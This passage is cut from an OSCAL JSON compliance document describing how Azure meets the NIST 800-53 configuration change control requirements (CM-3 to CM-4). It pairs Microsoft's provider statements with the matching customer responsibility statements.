from baseline experts across Microsoft along with the environment-specific considerations and some role- or instance-specific settings are used to establish the configuration settings. Changes to configuration baselines are handled through the update process at least annually, but also when new asset types are added to the inventory._x000D_ _x000D_ Changes to operational services can only be made when there is a valid business reason such as a planned upgrade to the service. Changes implemented within the production environment are categorized into Request for Change (RFC) types to appropriately schedule, align resources, and provide change metrics back into the change process for continuous improvement. Azure service teams use the following RFC types: Major Release, Minor Release, and Revision Release. Naming convention for build releases varies by service teams and the specific processes required for the release are specified in the service team specific change management process documents._x000D_ _x000D_ Changes to configuration settings on Azure assets are handled in two ways. Code changes, image updates, and network device gold images follow the Microsoft Security Development Lifecycle (SDL) process, which requires security signoffs prior to production deployment. Changes to the configuration settings are deployed to the production environment using the change and release management process, including mandatory Safe Deployment Practices (SDP). These processes validate that the configuration setting changes move from one environment to the other with designated signoffs by appropriate Azure service team personnel. Access to migrate changes to production is restricted to the appropriate users via OneIdentity security groups._x000D_ _x000D_ Changes to configuration settings on running assets made through interactive means, such as logging into and changing a configuration setting of a Windows server, must be made through the standard access elevation process. Different assets have different protections in place, depending on the impact of the change._x000D_ _x000D_ Servers_x000D_ _x000D_ Azure Security Monitoring (ASM) monitors for configuration setting changes. Service teams are able to make certain changes that not security relevant without response or alerting, but if critical configuration settings, such as audit and log settings, are changed, the action generates an IcM ticket for remediation._x000D_ _x000D_ Network Devices_x000D_ _x000D_ Any network device change not correlated with a work ticket will generate an IcM ticket for investigation and potential remediation._x000D_ _x000D_"}],"responsibilities":[{"uuid":"30a66726-730d-47e6-8823-c795d45daa58","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-014"}],"description":"The customer is responsible for determining what types of changes to customer-deployed resources are configuration-controlled.","provided-uuid":"5b7618d0-ec7c-4a4d-849a-e5218d7c9ea4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d7aac68d-4dc1-4880-a9e9-53db0f6b3a15","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.b","by-components":[{"uuid":"2bcc5f4e-9b00-4611-b567-2b1ebd5defb1","export":{"provided":[{"uuid":"39608c39-30bb-47bc-b17b-49b40728b025","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-015"}],"description":"All changes under configuration control to Azure assets are reviewed and approved or disapproved with explicit consideration for security impact analysis. Per the Microsoft Change Management Standard, all changes require documented testing procedures._x000D_ _x000D_ Servers_x000D_ _x000D_ It is the responsibility of the change tester to verify against defined test and success criteria and to record the test results in the work item tracking the change. For IPAK changes, all work items impacting code are triaged by the IPAK team before they are implemented. The triage process assesses the priority of the item and potential impact to customers. If an item is of a security nature, input from C+AI Platform Security is sought. For RDOS changes, changes are tested in a non-production environment before being promoted to production. All changes go through the standard change management process which includes a security impact analysis._x000D_ _x000D_ Network Devices_x000D_ _x000D_ Security impact analyses for network device changes are completed by performing a risk assessment for the change being performed._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3d11cc01-0905-40d5-9acd-681cb762fc7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-015"}],"description":"The customer is responsible for reviewing proposed configuration-controlled changes to customer-deployed resources.","provided-uuid":"39608c39-30bb-47bc-b17b-49b40728b025"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1c90e30f-e9bb-4ede-8aff-40c9000e9c55","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.c","by-components":[{"uuid":"81a9c299-c9f8-406a-9997-258eccf846bd","export":{"provided":[{"uuid":"181cd027-5d93-4988-bcfa-4a268cadd508","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-016"}],"description":"Azure service teams use Azure DevOps or IcM for change management tracking, where source code and work items related to configuration baselines and configuration settings are tracked. Work items and source code changes document evidence of approvals and track all changes made to releasing a new configuration setting._x000D_ _x000D_"}],"responsibilities":[{"uuid":"39a7b1c2-0d86-4bba-baec-4510b771c931","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-016"}],"description":"The customer is responsible for documenting configuration-controlled changes associated with customer-deployed resources (see CM-03.b).","provided-uuid":"181cd027-5d93-4988-bcfa-4a268cadd508"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e5826a47-850e-4434-8573-b765c302ff99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.d","by-components":[{"uuid":"c4f6c91a-172b-4ef6-8d65-5da6145f2c83","export":{"provided":[{"uuid":"498e2b4c-8874-4239-ab39-7b67652228cc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-017"}],"description":"Azure DevOps ensures that configuration-controlled changes are implemented after they are approved by tracking the change through implementation._x000D_ _x000D_"}],"responsibilities":[{"uuid":"96724ed3-4ebe-4f6c-8d5b-2e26abd676c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-017"}],"description":"The customer is responsible for implementing configuration-controlled changes approved in CM-03.b.","provided-uuid":"498e2b4c-8874-4239-ab39-7b67652228cc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5a0d85bd-51cf-4b2a-8a04-e7a5da05b4dd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.e","by-components":[{"uuid":"2956e2bd-35e5-4f29-a8c2-f6d84cfc7580","export":{"provided":[{"uuid":"3ea0f6ef-6ba7-42a8-a88b-9bffc42b4b04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-018"}],"description":"Depending on the type of change, the evidence of release approval is documented in either Azure DevOps or IcM. These change management records are retained for a minimum of ninety (90) days._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d16daf7d-fb8a-4161-92dc-f1f31be7059b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-018"}],"description":"The customer is responsible for retaining a record of configuration-controlled changes to customer-deployed resources.","provided-uuid":"3ea0f6ef-6ba7-42a8-a88b-9bffc42b4b04"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dc07b035-ed8f-4be7-ba40-54e7fdc2f685","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.f","by-components":[{"uuid":"dd38033d-3cf1-425c-a288-0629e9f8500b","export":{"provided":[{"uuid":"3220cfb8-a1f6-475c-9952-e7fe7e2baba7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-019"}],"description":"The tools outlined in Part c of this control provide an auditing capability to any changes to the configuration baselines or configuration settings within the tools. Azure uses Azure DevOps as the versioning system for software code, which tracks the identity of the person who checks code out, the time of the change, and what changes are made to what files. Software and hardware changes are tracked through Azure DevOps or IcM, which also provide detailed audit records of action taken. Deployment systems including OneBranch also audit and centrally report actions taken._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f50fc9c2-5e2c-463e-a52d-c8d89a732e06","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-019"}],"description":"The customer is responsible for auditing and reviewing configuration changes.","provided-uuid":"3220cfb8-a1f6-475c-9952-e7fe7e2baba7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"51823beb-95a8-49e1-a1ff-4de432c8fcbc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3_smt.g","by-components":[{"uuid":"38f34134-7cba-463a-8128-195d963e1167","export":{"provided":[{"uuid":"2c13a84a-c2d1-42e7-abe2-3a1d9f462820","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-020"}],"description":"All changes to the Azure production environment, except pre-approved changes, must go through peer review, oversight committee review, or crossgroup review approval. Each service team has an internal committee with designated roles; these meet at least monthly, or as needed._x000D_ _x000D_ There are a set of pre-approved changes which do not require additional explicit approval for release. These are standard procedures and common tasks that are documented and are confirmed to be safe to perform without going through the formal change management process. Examples of pre-approved Change Types are Create Certificate and Create Stage XStore Account._x000D_ _x000D_ For all Azure assets, Azure works with its authorizing officials by participating in regular meetings with the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators and ISSOs as needed to communicate major changes to or developments in the Azure environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4b73cdf3-c3c5-449e-b050-fc1932643535","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-020"}],"description":"The customer is responsible for coordinating and providing oversight for configuration change control activities.","provided-uuid":"2c13a84a-c2d1-42e7-abe2-3a1d9f462820"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c304aa66-3d6d-4783-8e6e-a760f37d389c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3.1","statements":[{"uuid":"d6ef922e-9013-4687-9477-f212558260ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.a","by-components":[{"uuid":"74cec9bb-b98e-43de-9482-ad19e139922f","export":{"provided":[{"uuid":"54b910b2-ffbb-4efb-a6da-fc9b0111f315","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-021"}],"description":"Depending on the type of change, configuration setting changes are documented in either Incident Management (IcM) or Azure DevOps. These change management records are retained for a minimum of ninety (90) days._x000D_ _x000D_"}],"responsibilities":[{"uuid":"75152b12-8e3a-4cd8-a855-231f1d3ed9fd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-021"}],"description":"The customer is responsible for employing automated mechanisms to document proposed changes (see CM-03.b).","provided-uuid":"54b910b2-ffbb-4efb-a6da-fc9b0111f315"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"65470158-2dcc-4d68-9838-667308d1a0a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.b","by-components":[{"uuid":"e32559cf-fe21-4477-b0d5-3b79273560e9","export":{"provided":[{"uuid":"b540617d-18c6-4c37-9306-4b830319b64e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-022"}],"description":"The IcM and DevOps automated tools used to track and document changes automatically notify the authorized approvers of proposed changes and request change approval. Records of changes are retained within tickets for all changes._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3a780046-d055-4f0f-b51f-88be97dbf77c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-022"}],"description":"The customer is responsible for employing an automated mechanism to route and request approval for proposed changes to customer-deployed resources.","provided-uuid":"b540617d-18c6-4c37-9306-4b830319b64e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8aba7df0-26e4-49e4-949e-7b6c68685629","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.c","by-components":[{"uuid":"15700a45-88e2-41e8-9c7d-64ce1dfc92cc","export":{"provided":[{"uuid":"60d9f8f1-6604-4398-a88e-42fa2f3bff71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-023"}],"description":"The current queue of proposed changes is reviewed by the service team as part of regular review meetings at least monthly. Changes can be abandoned; this is a normal part of the change management lifecycle._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d0672856-01b1-4fa4-b4c8-83a56bd917dc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-023"}],"description":"The customer is responsible for employing an automated mechanism to highlight unreviewed change proposals.","provided-uuid":"60d9f8f1-6604-4398-a88e-42fa2f3bff71"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"fee2655c-2da9-4707-ba43-fecb71188990","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.d","by-components":[{"uuid":"73d1ae91-6472-43dd-a71b-4fea54c7b3c4","export":{"provided":[{"uuid":"c7a70b60-67a6-4d48-8277-4b9a5502b7e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-024"}],"description":"All the change management tools prevent changes from being deployed without approval from an authorized approver. Interactive access via elevation to production assets requires separate approval or approval of properly configured auto-approval in the Just In Time (JIT) tool._x000D_ _x000D_"}],"responsibilities":[{"uuid":"497d6b52-9cac-41f7-9ba2-358f1e5de94f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-024"}],"description":"The customer is responsible for employing an automated mechanism to prohibit the implementation of unapproved changes to customer-deployed resources.","provided-uuid":"c7a70b60-67a6-4d48-8277-4b9a5502b7e3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ed923696-eca0-401a-99ad-dc767d8dad99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.e","by-components":[{"uuid":"68ccdbce-6782-45a5-812b-18285199ec17","export":{"provided":[{"uuid":"aa63568f-6e35-47f6-9f97-2af90ba2d073","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-025"}],"description":"All changes are tracked and documented within the appropriate automated change tracking system. Azure teams use tools such as Azure DevOps or IcM for documentation and tracking purposes. All assets implement auditing for changes made via interactive login._x000D_ _x000D_"}],"responsibilities":[{"uuid":"418c9cfd-4d74-4d93-a018-9ca84c869960","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-025"}],"description":"The customer is responsible for employing an automated mechanism to document all implemented changes to customer-deployed resources.","provided-uuid":"aa63568f-6e35-47f6-9f97-2af90ba2d073"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2a134a88-1a92-433a-a557-f8890067fcd0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.1_smt.f","by-components":[{"uuid":"edd4981d-2da8-43c3-a154-f7a97a0d3204","export":{"provided":[{"uuid":"50f0a6fd-9e15-48e7-a984-18046aef15d0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-026"}],"description":"Upon successful deployment of a change, the relevant service team management personnel, including the change submitters and approvers, are automatically notified by the change tracking system._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3c645dd6-fd12-461a-a709-0b77a4f3c62e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-026"}],"description":"The customer is responsible for employing an automated mechanism to provide notifications when approved changes to customer-deployed resources are completed.","provided-uuid":"50f0a6fd-9e15-48e7-a984-18046aef15d0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cd40c111-121b-4581-b1dc-9c12829fa66d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3.2","statements":[{"uuid":"217acf09-4a2f-4e96-97ba-508ee0358509","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.2_smt","by-components":[{"uuid":"d1ba918c-afbc-41ee-b5d4-62a4a49c2d81","export":{"provided":[{"uuid":"6c404e2d-aaf8-415f-b213-f79f22359c01","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-027"}],"description":"Azure tests and validates proposed system changes prior to deployment, either in a separate test environment, or by removing a server from production, making changes, testing, and returning the server to production upon successful completion. When testing and validation is complete, results are documented in the relevant change tracking tool, either Azure DevOps or Incident Management (IcM) depending on the team._x000D_ _x000D_ All code impacting work items are triaged before they are implemented. The triage process assesses the priority of the item and potential impact to customers. If an item is of a security nature, input from C+AI Security is sought. Assets have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified. This ensures recently deployed software should be propagated to more assets or rolled back as health indicators dictate._x000D_ _x000D_ Testing procedures for changes are documented within change tickets. Configuration changes and associated approvals and documentation are all kept within tickets or RFC. Automation is built into the change management tool throughout the change lifecycle including documenting changes to the information system._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a7864ece-2218-400a-a7ee-fa900ff083c6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-027"}],"description":"The customer is responsible for testing, validating, and documenting changes to customer-deployed resources before implementation.","provided-uuid":"6c404e2d-aaf8-415f-b213-f79f22359c01"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a8db4809-07f1-4a65-90d8-b78fbadc0256","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3.4","statements":[{"uuid":"2b4e1eca-cff5-417c-937e-587aba8c04eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.4_smt","by-components":[{"uuid":"257194af-c084-4b20-9668-c19e0f4148ec","export":{"provided":[{"uuid":"0848bd48-c942-421f-a47a-7f5d7fb93ec6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-028"}],"description":"All changes, except pre-approved changes, to the Azure production environment must go through service team committee approval. Each service team has an internal committee with designated roles, and which include representatives from Azure Security; these meet at least monthly or as needed._x000D_ _x000D_ Servers_x000D_ _x000D_ The C+AI Platform Security baseline team establishes and maintains the configuration baseline standards for operating systems and service network configurations. The baselines are established based on industry standards, including DISA STIGs, CIS, NSA, and various vulnerability library knowledge bases that are configuration related, and through review of security settings baseline experts within C+AI Platform Security including the Security Assurance team and Microsoft Security Response Center and other baseline experts across other Microsoft divisions who participate in the overall Shared Baselines Teams group virtual team. The industry standards and input from baseline experts across Microsoft along with the environment specific considerations and some role specific settings - e.g. domain controller, workgroup server, domain joined server - are used to establish the configuration settings. The Shared Baselines crossgroup includes required representatives from C+AI Platform Security including members from the Security Response Team and the Security Assurance team. Additionally, key participants include members from the incident response team and participants from Microsoft consulting who bring in field experience._x000D_ _x000D_ Network Devices_x000D_ _x000D_ For network devices, the Azure Network Engineering teams sets the configuration baseline standards for all network devices, using recommended configurations specific to each hardware vendor including applicable STIGs, and makes updates periodically based upon recommendations from the vendor. For each type of device, the Azure Network Engineering teams maintains configuration baselines in Network Device Manager (NDM). Only the Azure Networking team can make changes to configuration baselines for network devices in the Azure environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"b964d0ca-d3fc-48d2-8a92-c12e21af56d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-028"}],"description":"The customer is responsible for assigning an information security representative to be a member of the change control element defined in CM-03.g.","provided-uuid":"0848bd48-c942-421f-a47a-7f5d7fb93ec6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ac0eba5b-3365-4456-818c-9ac2e9187099","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-3.6","statements":[{"uuid":"5b9a0071-dcf8-47e6-93a7-7d45f8e84d43","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-3.6_smt","by-components":[{"uuid":"aff70443-1a5d-4edc-b62b-718128268881","export":{"provided":[{"uuid":"f0f8b0f3-552b-4cd0-bddd-ac3abb677d07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-029"}],"description":"Azure Security manages cryptographic secrets on behalf of service teams using an approved secret management store, either Azure Key Vault or dSMS. Microsoft uses the stores to implement cryptographic mechanisms, including to administer and store both group and shared account credentials, as well as to obtain and renew certificates. Cryptography changes follow the standard security review process. Cryptographic changes not expressly allowed by established baselines - e.g. when an Azure team requests a non-standard change to configuration settings - are not allowed to be made to the Azure current configuration without a completed review. The security review process is run by security representatives in C+AI Security. Changes made to cryptography are not implemented unless approved via the security review process including approval by Crypto Board._x000D_ _x000D_ Azure Security controls the configuration of the stores using the Cryptographic Controls SOP, with which the stores are required to comply. For instance, when Microsoft deprecates formerly-approved cryptographic algorithms or key lengths through the change management process, the secret management stores are able to check the inventory of all existing secrets to identify any that rely on the newly-deprecated mechanism._x000D_ _x000D_"}],"responsibilities":[{"uuid":"a9be5381-fb42-4e69-815a-dd0d9c768ae5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-029"}],"description":"The customer is responsible for ensuring that cryptographic mechanisms are under configuration management. Microsoft Azure provides the capability for customers to implement configuration management actions over cryptographic secrets using Key Vault functionality, including granular management of cryptographic keys.","provided-uuid":"f0f8b0f3-552b-4cd0-bddd-ac3abb677d07"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f61f4e5b-847f-4c02-ad1c-947060290c2c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-4","statements":[{"uuid":"7e029d09-8dd4-4290-91f0-ab681fa3f37c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-4_smt","by-components":[{"uuid":"09f5f308-3f6f-4039-aa23-948cebf40f33","export":{"provided":[{"uuid":"fe7c7337-821c-4ebc-8a4b-41e30c5b252f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-030"}],"description":"As part of the Security Development Lifecycle (SDL) process, Azure analyzes software and hardware changes to determine potential security impacts prior to change implementation. Changes are required to be documented, tested, and approved by appropriate service team personnel. For all asset types, changes are analyzed as part of the standard change management process, both prior to and after implementation, to verify what was modified resulted in expected output. The SDL process is followed for all engineering and development projects. The SDL process consists of five phases: Requirements, Design, Implementation, Verification and Release. The Requirements phase considers the foundational security, privacy, and cost requirements for a given product. The Design phase is the creation of the plan to implement the product to meet the defined requirements, including risk and threat model analysis. The implementation phase is when security documentation is created for the product, allowing users and customers to make informed decisions on how to deploy it, as well as initial testing to remove any security or privacy issues. The Verification phase is when the implementation is reviewed to ensure that the security and privacy tenets defined in the Requirements phase, and where full product testing takes place. Finally, the Release phase is the creation of incident planning, should any issues regarding the product arise once it is available. Each service team tests proposed system changes prior to deployment, either in a separate test environment, or by removing a server from production, making changes, testing, and returning the server to production upon successful completion. Azure implements safe deployment known as Safe Deployment Practices (SDP), which includes testing in canary regions and rolling out to increasing percentages of the applicable environment before considering the rollout complete. Azure assets have a set of runners which leverage information captured by Geneva Monitoring to run automated tests for checking the health of the components. Runners are configured to automatically generate alerts if any component health discrepancies are identified. This ensures recently deployed software should be propagated to more assets or rolled back as health indicators dictate. If there are any issues during the rollout, the deployment is halted to investigate."}],"responsibilities":[{"uuid":"4c24b8e6-cc0e-405f-a327-7fae969f8358","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-030"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for analyzing proposed changes to customer-deployed resources to determine potential security and privacy impacts prior to implementation.","provided-uuid":"fe7c7337-821c-4ebc-8a4b-41e30c5b252f"}]},"description":"See inheritance and customer responsibility 